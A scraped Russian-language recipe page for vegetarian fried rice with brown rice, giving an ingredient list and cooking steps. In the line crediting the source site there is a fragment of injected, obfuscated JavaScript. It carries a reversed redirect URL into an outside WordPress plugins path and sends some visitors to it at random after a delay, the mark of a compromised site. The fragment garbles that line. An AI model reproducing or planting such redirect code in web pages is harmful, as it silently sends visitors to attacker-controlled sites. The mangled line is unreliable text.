Полина Глухова предлагает классическое китайское блюдо с коричневым рисом, который гораздо полезнее белого.
5 ВИДОВ РИСА: ЧЕМ ОНИ ОТЛИЧАЮТСЯ И КАКОЙ САМЫЙ ПОЛЕЗНЫЙ
Вегетарианский жареный рис
Фото: cookingclassy.com
Фото: cookingclassy.com
Рецепт дня: вегетарианский жареный рис
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
40 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
6
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Коричневый рис
3 стакана
Нарезанная морковь
1 стакан
Нарезанный лук
1 стакан
Измельчённый чеснок
4 зубчика
Очищенный и рубленый свежий имбирь
2 ст. л.
Нарезанная брокколи
1/2 стакана
Нарезанный красный перец
3/4 стакана
Горох
3/4 стакана
Кукуруза
3/4 стакана
Яйцо
4 шт.
Растительное масло
2 ст. л.
- Варите рис около 20 минут, предварительно посолите воду. Затем оставьте рис охлаждаться.
- Нагрейте растительное масло в глубокой антипригарной сковороде. Добавьте нарезанные овощи: морковь, лук, чеснок и имбирь. Через три минуты добавьте брокколи и перец. Обжаривайте около трёх минут.
- Добавьте яйца. Перемешайте. Добавьте рис, горох и кукурузу. Полейте всё соевым соусом и растительным маслом (не забудьте перемешать) и продолжайте жарить ещё три минуты.
- Подавайте блюдо тёплым.